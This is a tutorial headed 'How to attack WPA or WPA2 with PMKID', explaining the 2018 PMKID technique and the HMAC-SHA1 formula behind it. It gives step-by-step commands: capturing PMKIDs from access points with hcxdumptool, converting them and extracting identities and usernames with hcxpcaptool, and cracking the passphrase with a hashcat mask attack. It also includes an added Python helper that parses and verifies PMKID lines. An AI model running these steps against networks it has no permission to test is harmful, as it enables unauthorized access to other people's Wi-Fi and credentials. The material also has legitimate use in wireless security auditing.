HOW TO ATTACK WPA OR WPA2 WITH PMKID



As you know, many things in this world are discovered accidentally, and this attack is one of them: in 2018 it was found while looking for new ways to attack the WPA3 security standard. By the way, WPA3 is much harder to attack because it uses a modern key establishment protocol called SAE, "Simultaneous Authentication of Equals".


This attack needs the following tools:
hcxdumptool v4.2.0 or higher
hcxtools v4.2.0 or higher
hashcat v4.2.0 or higher

The main difference from existing attacks is that this attack does not require capturing the full EAPOL exchange (the 4-way handshake).

This attack does not work on all routers. It works against 802.11i/p/q/r networks with the roaming function enabled.

The main advantages of this attack are as follows:
  • No regular users are required, because the attacker communicates directly with the AP.
  • No more waiting for a complete 4-way handshake between the regular user and the AP.
  • No more eventual re-transmissions of EAPOL frames.
  • No more eventual invalid passwords sent by the regular user.
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker.
  • No more fixing of nonce and replay counter values required.
  • No more special output formats (pcap, hccapx, etc.).
Details about the attack:


The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID.


The PMKID is computed with HMAC-SHA1, where the key is the PMK and the data is the concatenation of the fixed string label "PMK Name", the access point's MAC address and the station's MAC address:

code:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)


Since the PMK is the same as in a regular EAPOL 4-way handshake, this is an ideal attack vector.

We receive all the data we need in the first EAPOL frame from the AP.

Procedure:

1. Run hcxdumptool to request the PMKID from the AP and dump the received frame to a file in pcapng format:

       $ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status

After some time the status output shows the message "FOUND PMKID".

2. Convert the capture into hashcat's format:

       $ ./hcxpcaptool -z test.16800 test.pcapng

After processing, the written file contains lines that look like this:

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

The columns are:
  • PMKID
  • MAC AP
  • MAC STATION
  • ESSID

The same tool can also write the ESSIDs, identities and user names it finds in the capture to separate list files:

       $ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
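As an added example (not code from the original post or from the hcxtools/hashcat projects), the PMKID formula above and the four-column file format in Python: it parses the sample line, computes a PMKID from a PMK, and lets a network owner who knows their own PMK confirm whether a captured line actually belongs to their AP. The PMK used here is a constructed placeholder.

```python
import hmac
import hashlib

# The sample line from the post above, in hashcat's "16800" layout:
# PMKID * MAC_AP * MAC_STA * ESSID (the ESSID is hex encoded and may be non-printable)
SAMPLE_LINE = ("2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*"
               "ed487162465a774bfba60eb603a39f3a")


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA): the first 16 bytes of the tag."""
    if len(pmk) != 32 or len(mac_ap) != 6 or len(mac_sta) != 6:
        raise ValueError("PMK must be 32 bytes, MAC addresses 6 bytes each")
    data = b"PMK Name" + mac_ap + mac_sta
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def parse_16800_line(line: str) -> dict:
    """Split one hcxpcaptool -z output line into its four fields and decode them."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError("expected 4 '*'-separated fields")
    pmkid_hex, ap_hex, sta_hex, essid_hex = parts
    if len(pmkid_hex) != 32 or len(ap_hex) != 12 or len(sta_hex) != 12:
        raise ValueError("bad field length (PMKID 32 hex chars, MACs 12 hex chars)")
    return {
        "pmkid": bytes.fromhex(pmkid_hex),
        "mac_ap": bytes.fromhex(ap_hex),
        "mac_sta": bytes.fromhex(sta_hex),
        "essid": bytes.fromhex(essid_hex),  # kept as bytes: not guaranteed to be text
    }


def format_16800_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, essid: bytes) -> str:
    """Inverse of parse_16800_line: build a line in the same layout."""
    return "*".join(x.hex() for x in (pmkid, mac_ap, mac_sta, essid))


def line_matches_pmk(line: str, pmk: bytes) -> bool:
    """True if the captured PMKID was derived from this PMK (constant-time comparison).

    A network owner who knows their own PMK can use this to confirm that a
    captured line really refers to their AP and passphrase.
    """
    rec = parse_16800_line(line)
    expected = compute_pmkid(pmk, rec["mac_ap"], rec["mac_sta"])
    return hmac.compare_digest(expected, rec["pmkid"])


if __name__ == "__main__":
    rec = parse_16800_line(SAMPLE_LINE)
    print("AP:", rec["mac_ap"].hex(), "STA:", rec["mac_sta"].hex(), "ESSID bytes:", rec["essid"])
    placeholder_pmk = bytes(range(32))  # constructed, not a real network's PMK
    print("matches placeholder PMK:", line_matches_pmk(SAMPLE_LINE, placeholder_pmk))
```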

3. Run hashcat to crack it:

      $ ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

